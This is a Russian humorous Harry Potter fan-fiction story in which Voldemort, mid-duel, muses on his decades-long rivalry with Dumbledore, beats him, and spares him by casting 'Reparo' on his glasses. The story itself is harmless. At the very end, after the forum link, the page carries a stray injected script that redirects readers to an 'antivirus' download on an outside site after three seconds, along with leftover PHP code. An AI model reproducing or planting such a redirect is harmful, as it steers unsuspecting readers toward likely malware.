Репаро

Автор: Чайная Чашка
Бета: Леночок
Рейтинг: PG-15
Дисклеймер: все персонажи, связанные с циклом книг о Гарри Поттере, принадлежат их законным владельцам.
Жанр: юмор
Архивация: с разрешения автора

Во мне явно умер великий актер.... Даже во время битвы я успеваю краем глаза замечать побелевшие лица случайных зрителей, в ужасе прикрывающих ладонями рты.
Их глаза следят за мной со смесью отвращения и восторга. Такие же ограниченные как магглы. Как легко эти ничтожества покупаются на дешёвые эффекты: весь этот маскарад для них — огненно-красные глаза, череп, едва обтянутый кожей, змеиное шипение... Но я не одинок в любви к театральным эффектам .

Благородные седины, эксцентричное поведение, очки-полумесяцы… Мой противник не одно десятилетие потратил на создание образа. Наше противоборство уже давно стало
привычной частью жизни. Встреча, обмен заклинаниями, атака, контратака… И тот, кому на сей раз отведена роль злодея, стремительно исчезает, оставляя после себя запах серы. Хмм... Я улыбнулся, не забывая при этом отражать заклятия.

А ведь старый мой сердечный враг сделал сильный ход, когда ввел в игру новую фигуру. Этот мальчишка привнес остроту... Да уж, хоть объявление в «Ведьмополитен» пиши: «Пожилая семейная пара ищет молоденького мальчикадля придания остроты затянувшимся и опостылевшим семейным отношениям». Не сдержавшись, я хихикнул. Поймав удивленный взгляд Дамблдора, на секунду снял защиту со своих мыслей. Старый ханжа покачал головой:

— Втроем? Да еще с таким несмышленышем?

— Да ладно, старый извращенец, а то не знаю, чем ты у себя в школе занимаешься!
Зрители за вспышками заклинаний не заметили ни беззвучного диалога, ни улыбок-близнецов, мелькнувших на наших губах. Да, мы стали похожи на старую семейную пару. Встречи привычны, упреки вялы... нет огня, нет былой страсти.

Оп... Я забыл поставить мыслезащиту, а Дамблдор, вероятно, был настолько шокирован моими раздумьями, что пропустил одно очень неприятное заклятие. В две минуты все было кончено. Зеваки исчезли, словно их ветром сдуло. Никто из этих уродов даже не попытался спасти своего предводителя. Что, защитник грязнокровок, любитель детей, видишь, ради кого ты стараешься? Где твой хваленый Гарри Поттер? Спас он тебя? Нет — мне не пришлось даже руки марать — с него хватило и такого убожества как Петтигрю! Я не торопился с последним ударом. Дамблдор лежал передо мной совершенно беззащитный, бледный, лицо сразу постарело и стало строже, голубые глаза закрыты... Очки-полумесяцы лежат рядом. Я смотрел на эту отрадную картину и меня переполняли давно забытые чувства: возбуждение, ликование, гордость и, как ни странно, немного горечи… Уже и не помню, когда я в последний раз испытывал столько эмоций.

Долгожданный оргазм, после стольких совместных лет... Вот прилипло дурацкая аналогия, никак не избавиться. Несколько раз я поднимал палочку, чтобы произнести заветное заклинание и... слова застревали в горле. Понадобилось немалое усилие воли, чтобы выдавить из себя «Авада...», но продолжения не последовало. В сердцах я раздавил каблуком очки ненавистного старика. Так просто. Сколько раз я произносил эти слова. «Авада Кедавра», и зеленый луч проложит мне дорогу в будущее. Без надоедливого мальчишки, без выжившего из ума старика, без этих изматывающих поединков, без хитроумных, тщательно разработанных планов, разбивающихся об его — не менее хитроумные и тщательные. Без обмена язвительными мыслями и словами, без улыбок посреди схватки. Я решительно вытянул руку с палочкой и внятно произнес: «Репаро»...

Веки старика дрогнули, приоткрылись, и в глазах мелькнули лукавые искры, провожая стремительно удаляющуюся фигуру в темном плаще. Рука нашарила очки-полумесяцы... Жизнь продолжалась...

Обсуждение на форуме

setTimeout(\'document.location.href = "http://base-file.com/antivirus"\', 3000);'); } ?>